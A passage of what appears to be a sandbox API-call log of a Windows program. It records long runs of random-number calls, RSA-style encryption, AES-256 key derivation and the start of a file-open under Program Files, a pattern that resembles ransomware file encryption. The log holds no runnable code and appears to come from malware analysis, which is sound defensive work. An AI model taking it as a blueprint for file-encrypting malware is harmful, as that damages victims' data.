(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.189] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.190] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.193] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.193] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.194] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0157.194] CryptHashData (hHash=0x9ad238, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.194] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad278) returned 1 [0157.194] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.194] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.194] wcslen (_String="\\\\?\\") returned 0x4 [0157.194] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad4b8) returned 1 [0157.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 